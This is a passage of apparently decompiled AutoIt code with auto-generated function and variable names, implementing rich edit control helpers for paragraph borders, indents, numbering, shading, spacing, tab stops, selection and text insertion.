  3801. $Local00A3 &=Fn0102(Fn0147($Arg00),"f" ,"c" )
  3802. RETURN $Local00A3
  3803. ENDFUNC
  3804.  
  3805. Func Fn0133($Arg00)
  3806. LOCAL CONST $Var0554 [ 6 ][ 2 ]=[["l" , 1 ],["r" , 2 ],["t" , 4 ],["b" , 8 ],["i" ,0x0010 ],["o" ,0x0020 ]]
  3807. LOCAL CONST $Var0555 [0x000C ]=["none" , .75 , 1.5 , 2.25 , 3 , 4.5 , 6 ,".75d" ,"1.5d" ,"2.25d" ,".75g" ,".75gd" ]
  3808. LOCAL CONST $Var0556 ="blk;blu;cyn;grn;mag;red;yel;whi;dbl;dgn;dmg;drd;dyl;dgy;lgy;"
  3809. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  3810. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  3811. DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
  3812. Fn017B($Arg00,$Local00B4 )
  3813. IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
  3814. LOCAL $Local00A1 =DLLSTRUCTGETDATA($Local00B4 , 2 )
  3815. LOCAL $Local00B6 =DLLSTRUCTGETDATA($Local00B4 ,0x0016 )
  3816. LOCAL $Local00B7 =DLLSTRUCTGETDATA($Local00B4 ,0x0018 )
  3817. LOCAL $Local00A7 =""
  3818. FOR $Local00EB = 0 TO UBOUND($Var0554 , 1 )- 1
  3819. IF BITAND($Local00B7 ,$Var0554 [$Local00EB ][ 1 ])THEN $Local00A7 &=$Var0554 [$Local00EB ][ 0 ]
  3820. NEXT
  3821. $Local00A7 &=";"
  3822. $Local00A7 &=$Var0555 [BITSHIFT(BITAND($Local00B7 ,0x0F00 ), 8 )]
  3823. $Local00A7 &=";"
  3824. IF BITAND($Local00B7 ,0x0040 )THEN
  3825. $Local00A7 &="aut"
  3826. ELSE
  3827. $Local00A7 &=STRINGMID($Var0556 ,BITSHIFT(BITAND($Local00B7 ,0xF000 ),0x000C )* 4 + 1 , 3 )
  3828. ENDIF
  3829. $Local00A7 &=";"
  3830. $Local00A7 &=Fn0175($Local00B6 )&";"
  3831. $Local00A7 &=Fn0177($Arg00,$Local00A1 ,$Var03A6 )
  3832. RETURN $Local00A7
  3833. ENDFUNC
  3834.  
  3835. Func Fn0134($Arg00)
  3836. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  3837. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  3838. DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
  3839. DLLSTRUCTSETDATA($Local00B4 ,"dwMask" ,BITOR($Var03AA ,$Var03AC ))
  3840. Fn017B($Arg00,$Local00B4 )
  3841. IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
  3842. LOCAL $Local00A1 =DLLSTRUCTGETDATA($Local00B4 ,"dwMask" )
  3843. LOCAL $Local00B8 =DLLSTRUCTGETDATA($Local00B4 ,"dxStartIndent")
  3844. LOCAL $Local00B9 =DLLSTRUCTGETDATA($Local00B4 ,"dxOffset" )
  3845. LOCAL $Local00BA =DLLSTRUCTGETDATA($Local00B4 ,"dxRightIndent")
  3846. LOCAL $Local00BB =Fn0175($Local00B8 +$Local00B9 )
  3847. LOCAL $Local00BC =Fn0175(-$Local00B9 )
  3848. LOCAL $Local00BD =Fn0175($Local00BA )
  3849. LOCAL $Local0055 =$Local00BB &";" &$Local00BD &";" &$Local00BC &";" &Fn0177($Arg00,$Local00A1 ,$Var03AA )
  3850. RETURN $Local0055
  3851. ENDFUNC
  3852.  
  3853. Func Fn0135($Arg00)
  3854. LOCAL CONST $Var0557 [ 7 ][ 2 ]=[[0x03E8 ,"m" ],[0x01F4 ,"d" ],[0x0064 ,"c" ],[0x0032 ,"l" ],[ 10 ,"x" ],[ 5 ,"v" ],[ 1 ,"i" ]]
  3855. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  3856. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  3857. DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
  3858. DLLSTRUCTSETDATA($Local00B4 , 2 ,BITOR($Var039C ,$Var03A4 ,$Var03A2 ))
  3859. Fn017B($Arg00,$Local00B4 )
  3860. IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
  3861. LOCAL $Local00A1 =DLLSTRUCTGETDATA($Local00B4 ,"dwMask" )
  3862. LOCAL $Local00BE =DLLSTRUCTGETDATA($Local00B4 ,"wNumbering")
  3863. LOCAL $Local00BF =DLLSTRUCTGETDATA($Local00B4 ,"wNumberingStart")
  3864. LOCAL $Local00C0 =DLLSTRUCTGETDATA($Local00B4 ,"wNumberingStyle")
  3865. LOCAL $Local00C1 =DLLSTRUCTGETDATA($Local00B4 ,"wNumberingTab")
  3866. LOCAL $Local00A7 =""
  3867. SWITCH $Local00BE
  3868. CASE 0
  3869. $Local00A7 =""
  3870. CASE 1
  3871. $Local00A7 ="."
  3872. CASE 2
  3873. $Local00A7 =$Local00BF
  3874. CASE 3
  3875. $Local00A7 =CHR(ASC("a" )+$Local00BF - 1 )
  3876. CASE 4
  3877. $Local00A7 =CHR(ASC("a" )+$Local00BF - 1 )
  3878. CASE 5 , 6
  3879. FOR $Local00EB = 0 TO UBOUND($Var0557 , 1 )- 2 STEP 2
  3880. FOR $Var0558 =$Local00EB TO $Local00EB + 1
  3881. WHILE $Local00BF >=$Var0557 [$Var0558 ][ 0 ]
  3882. $Local00A7 &=$Var0557 [$Var0558 ][ 1 ]
  3883. $Local00BF -=$Var0557 [$Var0558 ][ 0 ]
  3884. WEND
  3885. IF $Local00BF =$Var0557 [$Var0558 ][ 0 ]- 1 THEN
  3886. $Local00A7 &=$Var0557 [$Local00EB + 2 ][ 1 ]&$Var0557 [$Var0558 ][ 1 ]
  3887. $Local00BF -=$Var0557 [$Var0558 ][ 0 ]-$Var0557 [$Local00EB + 2 ][ 0 ]
  3888. ENDIF
  3889. NEXT
  3890. NEXT
  3891. WHILE $Local00BF > 0
  3892. $Local00A7 &="i"
  3893. $Local00BF -= 1
  3894. WEND
  3895. IF $Local00BE = 6 THEN $Local00A7 =STRINGUPPER($Local00A7 )
  3896. ENDSWITCH
  3897. IF $Local00BE > 1 THEN
  3898. SWITCH $Local00C0
  3899. CASE 0
  3900. $Local00A7 &=")"
  3901. CASE 0x0100
  3902. $Local00A7 ="(" &$Local00A7 &")"
  3903. CASE 0x0200
  3904. $Local00A7 &="."
  3905. CASE 0x0300
  3906. ENDSWITCH
  3907. ENDIF
  3908. LOCAL $Local00C2 =Fn0129($Arg00)
  3909. LOCAL $Local00C3 =$Local00C2 [ 0 ]
  3910. LOCAL $Local00C4 =ROUND($Local00C1 /($Local00C3 *0x0014 ), 0 )
  3911. FOR $Local00EB = 1 TO $Local00C4
  3912. $Local00A7 &=" "
  3913. NEXT
  3914. $Local00A7 &=";"
  3915. $Local00A7 &=Fn0102($Local00BE = 5 OR $Local00BE = 6 ,"Roman;" ,";" )
  3916. $Local00A7 &=Fn0175($Local00C1 )&";"
  3917. $Local00A7 &=Fn0177($Arg00,$Local00A1 ,BITOR($Var039C ,$Var03A4 ,$Var03A2 ))
  3918. RETURN $Local00A7
  3919. ENDFUNC
  3920.  
  3921. Func Fn0136($Arg00)
  3922. LOCAL CONST $Var0559 [0x000D ]=["non" ,"dhz" ,"dvt" ,"ddd" ,"dud" ,"dgr" ,"dtr" ,"lhz" ,"lrt" ,"ldd" ,"lud" ,"lgr" ,"ltr" ]
  3923. LOCAL CONST $Var055A [0x0010 ]=["blk" ,"blu" ,"cyn" ,"grn" ,"mag" ,"red" ,"yel" ,"whi" ,"dbl" ,"dgn" ,"dmg" ,"drd" ,"dyl" ,"dgy" ,"lgy" ]
  3924. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  3925. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  3926. DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
  3927. Fn017B($Arg00,$Local00B4 )
  3928. IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
  3929. LOCAL $Local00A1 =DLLSTRUCTGETDATA($Local00B4 ,"dwMask" )
  3930. LOCAL $Local00C5 =DLLSTRUCTGETDATA($Local00B4 ,"wShadingWeight")
  3931. LOCAL $Local00C6 =DLLSTRUCTGETDATA($Local00B4 ,"wShadingStyle")
  3932. LOCAL $Local00A7 =$Local00C5 &";"
  3933. LOCAL $Local001C =BITAND($Local00C6 ,0x000F )
  3934. $Local00A7 &=$Var0559 [$Local001C ]&";"
  3935. $Local001C =BITSHIFT(BITAND($Local00C6 ,0x00F0 ), 4 )
  3936. $Local00A7 &=$Var055A [$Local001C ]&";"
  3937. $Local001C =BITSHIFT(BITAND($Local00C6 ,0x0F00 ), 8 )
  3938. $Local00A7 &=$Var055A [$Local001C ]&";"
  3939. $Local00A7 &=Fn0177($Arg00,$Local00A1 ,$Var03DA )
  3940. RETURN $Local00A7
  3941. ENDFUNC
  3942.  
  3943. Func Fn0137($Arg00)
  3944. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  3945. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
  3946. DLLSTRUCTSETDATA($Local00B4 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00B4 ))
  3947. Fn017B($Arg00,$Local00B4 )
  3948. IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
  3949. LOCAL $Local00C7 =DLLSTRUCTGETDATA($Local00B4 ,"dyLineSpacing")
  3950. LOCAL $Local00C8 =DLLSTRUCTGETDATA($Local00B4 ,"bLineSpacingRule")
  3951. LOCAL $Local00A7 =""
  3952. SWITCH $Local00C8
  3953. CASE 0
  3954. $Local00A7 ="1 line;"
  3955. CASE 1
  3956. $Local00A7 ="1.5 lines;"
  3957. CASE 2
  3958. $Local00A7 ="2 lines;"
  3959. CASE 3 , 4
  3960. $Local00A7 =Fn0175($Local00C7 )&";"
  3961. CASE 5
  3962. $Local00A7 =STRINGFORMAT("%.2f" ,$Local00C7 /0x0014 )&" lines;"
  3963. ENDSWITCH
  3964. LOCAL $Local00A1 = 0
  3965. $Local00A7 &=Fn0177($Arg00,$Local00A1 ,$Var03AE )&";"
  3966. LOCAL $Local00C9 =DLLSTRUCTGETDATA($Local00B4 ,"dySpaceBefore")
  3967. $Local00A7 &=Fn0175($Local00C9 )&";"
  3968. $Local00A7 &=Fn0177($Arg00,$Local00A1 ,$Var03A0 )&";"
  3969. LOCAL $Local00CA =DLLSTRUCTGETDATA($Local00B4 ,"dySPaceAfter")
  3970. $Local00A7 &=Fn0175($Local00CA )&";"
  3971. $Local00A7 &=Fn0177($Arg00,$Local00A1 ,$Var03B0 )
  3972. RETURN $Local00A7
  3973. ENDFUNC
  3974.  
  3975. Func Fn0138($Arg00)
  3976. LOCAL CONST $Var055B [ 5 ]=["l" ,"c" ,"r" ,"d" ,"b" ],$Var055C [ 6 ]=[" " ,"." ,"-" ,"_" ,"t" ,"=" ]
  3977. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
  3978. LOCAL $Local00B4 =DLLSTRUCTCREATE($Var052D )
  3979. DLLSTRUCTSETDATA($Local00B4 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00B4 ))
  3980. Fn017B($Arg00,$Local00B4 )
  3981. IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
  3982. LOCAL $Local00A1 =DLLSTRUCTGETDATA($Local00B4 ,"dwMask" )
  3983. LOCAL $Local00CB =DLLSTRUCTGETDATA($Local00B4 ,"cTabCount" )
  3984. LOCAL $Local00A7 =$Local00CB &";"
  3985. LOCAL $Local001C ,$Var055D
  3986. FOR $Local00EB = 1 TO $Local00CB
  3987. $Local001C =DLLSTRUCTGETDATA($Local00B4 ,"rgxTabs" ,$Local00EB )
  3988. $Local00A7 &=Fn0175(BITAND($Local001C ,0x000FFFFF ))
  3989. $Var055D =BITAND(BITSHIFT($Local001C ,0x0018 ),0x000F )
  3990. $Local00A7 &=$Var055B [$Var055D ]
  3991. $Var055D =BITAND(BITSHIFT($Local001C ,0x001C ),0x000F )
  3992. $Local00A7 &=$Var055C [$Var055D ]&";"
  3993. NEXT
  3994. $Local00A7 &=Fn0177($Arg00,$Local00A1 ,$Var03B6 )
  3995. RETURN $Local00A7
  3996. ENDFUNC
  3997.  
  3998. Func Fn0139($Arg00)
  3999. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  4000. LOCAL $Local00CC =Fn0006($Arg00,$Var055E )
  4001. RETURN Fn0102($Local00CC = 0 ,"",CHR($Local00CC ))
  4002. ENDFUNC
  4003.  
  4004. Func Fn013A($Arg00)
  4005. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  4006. LOCAL $Local0030 =DLLSTRUCTCREATE($Var010E )
  4007. Fn0006($Arg00,$Var0230 , 0 ,$Local0030 , 0 ,"wparam" ,"struct*" )
  4008. LOCAL $Local008E [ 2 ]
  4009. $Local008E [ 0 ]=DLLSTRUCTGETDATA($Local0030 ,"x" )
  4010. $Local008E [ 1 ]=DLLSTRUCTGETDATA($Local0030 ,"y" )
  4011. RETURN $Local008E
  4012. ENDFUNC
  4013.  
  4014. Func Fn013B($Arg00)
  4015. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  4016. LOCAL $Local00CD =DLLSTRUCTCREATE($Var0523 )
  4017. Fn0006($Arg00,$Var0200 , 0 ,$Local00CD , 0 ,"wparam" ,"struct*" )
  4018. LOCAL $Local008E [ 2 ]
  4019. $Local008E [ 0 ]=DLLSTRUCTGETDATA($Local00CD , 1 )
  4020. $Local008E [ 1 ]=DLLSTRUCTGETDATA($Local00CD , 2 )
  4021. RETURN $Local008E
  4022. ENDFUNC
  4023.  
  4024. Func Fn013C($Arg00)
  4025. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  4026. LOCAL $Local00CE =Fn013B($Arg00)
  4027. IF $Local00CE [ 0 ]=$Local00CE [ 1 ]THEN RETURN SETERROR(- 1 , 0 , 0 )
  4028. Fn0006($Arg00,$Var0543 ,- 1 , 0 )
  4029. LOCAL $Local00CF =Fn013B($Arg00)
  4030. LOCAL $Local008E [ 2 ]
  4031. IF $Local00CE [ 0 ]=$Local00CF [ 0 ]THEN
  4032. $Local008E [ 0 ]=$Local00CE [ 1 ]
  4033. $Local008E [ 1 ]=$Local00CE [ 0 ]
  4034. ELSE
  4035. $Local008E =$Local00CE
  4036. ENDIF
  4037. Fn0006($Arg00,$Var0543 ,$Local00CE [ 0 ],$Local00CE [ 1 ])
  4038. Fn00AF($Arg00)
  4039. RETURN $Local008E
  4040. ENDFUNC
  4041.  
  4042. Func Fn013D($Arg00)
  4043. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4044. IF NOT Fn0147($Arg00)THEN RETURN SETERROR(- 1 , 0 ,- 1 )
  4045. LOCAL $Local00CE =Fn013B($Arg00)
  4046. LOCAL $Local009C =DLLSTRUCTCREATE("wchar[" &$Local00CE [ 1 ]-$Local00CE [ 0 ]+ 1 &"]" )
  4047. Fn0006($Arg00,$Var0232 , 0 ,$Local009C , 0 ,"wparam" ,"struct*" )
  4048. RETURN DLLSTRUCTGETDATA($Local009C , 1 )
  4049. ENDFUNC
  4050.  
  4051. Func Fn013E()
  4052. SWITCH $Var04B9
  4053. CASE 0x05A0
  4054. RETURN "in"
  4055. CASE 0x0237
  4056. RETURN "cm"
  4057. CASE 56.7
  4058. RETURN "mm"
  4059. CASE 0x0014
  4060. RETURN "pt"
  4061. CASE 1
  4062. RETURN "tw"
  4063. ENDSWITCH
  4064. ENDFUNC
  4065.  
  4066. Func Fn013F($Arg00,$Arg01)
  4067. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4068. IF NOT Fn0176($Arg01,">0,-1" )THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
  4069. IF $Arg01>Fn012B($Arg00)THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
  4070. LOCAL $Local009B =Fn012C($Arg00,$Arg01)
  4071. IF $Local009B = 0 THEN RETURN ""
  4072. LOCAL $Local000C =DLLSTRUCTCREATE("short Len;wchar Text["&$Local009B + 2 &"]" )
  4073. DLLSTRUCTSETDATA($Local000C ,"Len" ,$Local009B + 2 )
  4074. IF $Arg01<>- 1 THEN $Arg01-= 1
  4075. LOCAL $Local0055 =Fn0006($Arg00,$Var055F ,$Arg01,$Local000C , 10 ,"wparam" ,"struct*" )
  4076. IF $Local0055 = 0 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
  4077. LOCAL $Local00D0 =DLLSTRUCTCREATE("wchar Text["&$Local009B + 1 &"]" ,DLLSTRUCTGETPTR($Local000C ))
  4078. RETURN STRINGLEFT(DLLSTRUCTGETDATA($Local00D0 ,"Text" ),$Local009B )
  4079. ENDFUNC
  4080.  
  4081. Func Fn0140($Arg00,$Arg01,$Arg02)
  4082. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4083. IF NOT Fn0176($Arg01,">=0" )THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  4084. IF NOT Fn0176($Arg02,">=0,-1" )THEN RETURN SETERROR(0x0407 , 0 ,FALSE )
  4085. IF NOT ($Arg02>$Arg01 OR $Arg02=- 1 )THEN RETURN SETERROR(0x0408 , 0 ,FALSE )
  4086. LOCAL $Local009B =Fn0126($Arg00)
  4087. LOCAL $Local009C =DLLSTRUCTCREATE("wchar[" &($Local009B + 4 )&"]" )
  4088. LOCAL $Local00D1 =DLLSTRUCTCREATE($Var0536 )
  4089. DLLSTRUCTSETDATA($Local00D1 , 1 ,$Arg01)
  4090. DLLSTRUCTSETDATA($Local00D1 , 2 ,$Arg02)
  4091. DLLSTRUCTSETDATA($Local00D1 , 3 ,DLLSTRUCTGETPTR($Local009C ))
  4092. Fn0006($Arg00,$Var023A , 0 ,$Local00D1 , 0 ,"wparam" ,"struct*" )
  4093. RETURN DLLSTRUCTGETDATA($Local009C , 1 )
  4094. ENDFUNC
  4095.  
  4096. Func Fn0141()
  4097. RETURN $Var04B8
  4098. ENDFUNC
  4099.  
  4100. Func Fn0142($Arg00,$Arg01)
  4101. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  4102. IF NOT Fn0176($Arg01,">=0" )THEN RETURN SETERROR(0x03FD , 0 , 0 )
  4103. IF $Arg01>Fn0126($Arg00)THEN RETURN SETERROR(0x03FE , 0 , 0 )
  4104. LOCAL $Local0030 =DLLSTRUCTCREATE($Var010E )
  4105. Fn0006($Arg00,$Var0560 ,$Local0030 ,$Arg01, 0 ,"struct*" ,"lparam" )
  4106. LOCAL $Local008E [ 2 ]
  4107. $Local008E [ 0 ]=DLLSTRUCTGETDATA($Local0030 ,"X" )
  4108. $Local008E [ 1 ]=DLLSTRUCTGETDATA($Local0030 ,"Y" )
  4109. RETURN $Local008E
  4110. ENDFUNC
  4111.  
  4112. Func Fn0143($Arg00,$Arg01)
  4113. Fn0167($Arg00,$Arg01,$Arg01)
  4114. IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,FALSE )
  4115. RETURN TRUE
  4116. ENDFUNC
  4117.  
  4118. Func Fn0144($Arg00,$ArgOpt01=TRUE )
  4119. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4120. IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  4121. Fn0006($Arg00,$Var0246 ,$ArgOpt01, 0 )
  4122. Fn00AF($Arg00)
  4123. ENDFUNC
  4124.  
  4125. Func Fn0145($Arg00,$Arg01)
  4126. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4127. IF $Arg01="" THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
  4128. LOCAL $Local0096 =DLLSTRUCTCREATE($Var0534 )
  4129. DLLSTRUCTSETDATA($Local0096 , 1 ,$Var02E2 )
  4130. Fn0118($Arg00)
  4131. LOCAL $Local0055
  4132. IF STRINGLEFT($Arg01, 5 )<>"{\rtf" AND STRINGLEFT($Arg01, 5 )<>"{urtf" THEN
  4133. DLLSTRUCTSETDATA($Local0096 , 2 ,$Var0302 )
  4134. $Local0055 =Fn0006($Arg00,$Var0274 ,$Local0096 ,$Arg01, 0 ,"struct*" ,"wstr" )
  4135. ELSE
  4136. DLLSTRUCTSETDATA($Local0096 , 2 ,$Var0300 )
  4137. $Local0055 =Fn0006($Arg00,$Var0274 ,$Local0096 ,$Arg01, 0 ,"struct*" ,"STR" )
  4138. ENDIF
  4139. IF NOT $Local0055 THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
  4140. RETURN TRUE
  4141. ENDFUNC
  4142.  
  4143. Func Fn0146($Arg00)
  4144. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4145. RETURN Fn0006($Arg00,$Var0561 )<> 0
  4146. ENDFUNC
  4147.  
  4148. Func Fn0147($Arg00)
  4149. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4150. LOCAL $Local00CD =DLLSTRUCTCREATE($Var0523 )
  4151. Fn0006($Arg00,$Var0200 , 0 ,$Local00CD , 0 ,"wparam" ,"struct*" )
  4152. RETURN DLLSTRUCTGETDATA($Local00CD , 2 )<>DLLSTRUCTGETDATA($Local00CD , 1 )
  4153. ENDFUNC
  4154.  
  4155. Func Fn0148($Arg00)
  4156. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4157. Fn0006($Arg00,$Var050D , 0 , 0 )
  4158. RETURN TRUE
  4159. ENDFUNC
  4160.  
  4161. Func Fn0149($Arg00,$ArgOpt01=TRUE )
  4162. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4163. LOCAL $Local001C =Fn0102($ArgOpt01,$Var04BD ,$Var04BC )
  4164. Fn0006($Arg00,$Var0248 ,$Local001C , 0 )
  4165. RETURN TRUE
  4166. ENDFUNC
  4167.  
  4168. Func Fn014A($Arg00)
  4169. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4170. Fn0006($Arg00,$Var050F ,FALSE , 0 )
  4171. ENDFUNC
  4172.  
  4173. Func Fn014B($Arg00)
  4174. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4175. RETURN Fn0006($Arg00,$Var024C , 0 , 0 )<> 0
  4176. ENDFUNC
  4177.  
  4178. Func Fn014C($Arg00,$Arg01,$ArgOpt02=TRUE )
  4179. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4180. IF NOT ISBOOL($ArgOpt02)THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
  4181. IF NOT Fn0147($Arg00)THEN RETURN SETERROR(- 1 , 0 ,FALSE )
  4182. LOCAL $Local009C =DLLSTRUCTCREATE("wchar Text["&STRINGLEN($Arg01)+ 1 &"]" )
  4183. DLLSTRUCTSETDATA($Local009C ,"Text" ,$Arg01)
  4184. IF Fn007B($Arg00,$Var04CB )THEN
  4185. Fn0006($Arg00,$Var0562 ,$ArgOpt02,$Local009C , 0 ,"wparam" ,"struct*" )
  4186. ELSE
  4187. LOCAL $Local00D2 =DLLSTRUCTGETSIZE($Local009C )
  4188. LOCAL $Var0563
  4189. LOCAL $Local006D =Fn00E2($Arg00,$Local00D2 ,$Var0563 )
  4190. Fn00E5($Var0563 ,$Local009C )
  4191. Fn0006($Arg00,$Var0562 ,$ArgOpt02,$Local006D , 0 ,"wparam" ,"ptr" )
  4192. Fn00DC($Var0563 )
  4193. ENDIF
  4194. RETURN TRUE
  4195. ENDFUNC
  4196.  
  4197. Func Fn014D($Arg00)
  4198. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4199. Fn0006($Arg00,$Var050F ,TRUE , 0 )
  4200. RETURN Fn0080($Arg00)
  4201. ENDFUNC
  4202.  
  4203. Func Fn014E($Arg00,$Arg01)
  4204. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
  4205. IF STRINGLEN($Arg01)<> 2 THEN RETURN SETERROR(0x03FD , 0 , 0 )
  4206. LOCAL $Local00D3 =STRINGLEFT($Arg01, 1 )
  4207. IF NOT ($Local00D3 ="l" OR $Local00D3 ="p" )THEN RETURN SETERROR(0x03FE , 0 , 0 )
  4208. $Local00D3 =STRINGRIGHT($Arg01, 1 )
  4209. IF NOT ($Local00D3 ="d" OR $Local00D3 ="u" )THEN RETURN SETERROR(0x03FF , 0 , 0 )
  4210. LOCAL $Local009F = 0
  4211. SWITCH $Arg01
  4212. CASE "ld"
  4213. $Local009F =$Var04F9
  4214. CASE "lu"
  4215. $Local009F =$Var04FB
  4216. CASE "pd"
  4217. $Local009F =$Var04FD
  4218. CASE "pu"
  4219. $Local009F =$Var04FF
  4220. ENDSWITCH
  4221. LOCAL $Local0055 =Fn0006($Arg00,$Var0564 ,$Local009F , 0 )
  4222. $Local0055 =BITAND($Local0055 ,0xFFFF )
  4223. IF BITAND($Local0055 ,0x8000 )<> 0 THEN $Local0055 =BITOR($Local0055 ,0xFFFF0000 )
  4224. RETURN $Local0055
  4225. ENDFUNC
  4226.  
  4227. Func Fn014F($Arg00,$Arg01)
  4228. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4229. IF NOT Fn0176($Arg01)THEN SETERROR(0x0066 , 0 ,FALSE )
  4230. LOCAL $Local0055 =Fn0006($Arg00,$Var0565 , 0 ,$Arg01)
  4231. IF $Local0055 = 0 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
  4232. RETURN TRUE
  4233. ENDFUNC
  4234.  
  4235. Func Fn0150($Arg00)
  4236. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4237. Fn0006($Arg00,$Var0566 , 0 , 0 )
  4238. RETURN TRUE
  4239. ENDFUNC
  4240.  
  4241. Func Fn0151($Arg00,$Arg01,$ArgOpt02=FALSE )
  4242. LOCAL CONST $Local00C2 [0x0011 ][ 3 ]=[["bo" ,$Var030E ,$Var0347 ],["di" ,$Var0314 ,$Var0348 ],["em" ,$Var0316 ,$Var0349 ],["hi" ,$Var031A ,$Var034A ],["im" ,$Var031C ,$Var034B ],["it" ,$Var031E ,$Var034C ],["li" ,$Var0324 ,$Var034D ],["ou" ,$Var0328 ,$Var034E ],["pr" ,$Var032A ,$Var034F ],["re" ,$Var032E ,$Var0350 ],["sh" ,$Var0330 ,$Var0351 ],["sm" ,$Var0334 ,$Var0352 ],["st" ,$Var0338 ,$Var0353 ],["sb" ,$Var033C ,$Var0304 ],["sp" ,$Var033D ,$Var0306 ],["un" ,$Var033E ,$Var0354 ],["al" ,$Var0308 ,$Var0344 ]]
  4243. IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
  4244. IF NOT ISBOOL($ArgOpt02)THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
  4245. LOCAL $Local00A1 = 0 ,$Local00A2 = 0 ,$Local00CC ,$Local00DD
  4246. FOR $Local00EB = 1 TO STRINGLEN($Arg01)STEP 3
  4247. $Local00DD =STRINGMID($Arg01,$Local00EB + 1 , 2 )
  4248. $Local00CC =- 1
  4249. FOR $Var0558 = 0 TO UBOUND($Local00C2 )- 1
  4250. IF $Local00C2 [$Var0558 ][ 0 ]=$Local00DD THEN
  4251. $Local00CC =$Var0558
  4252. EXITLOOP
  4253. ENDIF
  4254. NEXT
  4255. IF $Local00CC =- 1 THEN RETURN SETERROR(0x03FF ,$Local00DD ,FALSE )
  4256. $Local00A1 =BITOR($Local00A1 ,$Local00C2 [$Local00CC ][ 1 ])
  4257. $Local00DD =STRINGMID($Arg01,$Local00EB , 1 )
  4258. SWITCH $Local00DD
  4259. CASE "+"
  4260. $Local00A2 =BITOR($Local00A2 ,$Local00C2 [$Local00CC ][ 2 ])
  4261. CASE "-"
  4262. CASE ELSE
  4263. RETURN SETERROR(0x03FE ,$Local00DD ,FALSE )
  4264. ENDSWITCH
  4265. NEXT
  4266. LOCAL $Local00A0 =DLLSTRUCTCREATE($Var051D )
  4267. DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
  4268. DLLSTRUCTSETDATA($Local00A0 , 2 ,$Local00A1 )
  4269. DLLSTRUCTSETDATA($Local00A0 , 3 ,$Local00A2 )
  4270. LOCAL $Local009F =Fn0102($ArgOpt02,BITOR($Var0382 ,$Var0380 ),$Var0380 )
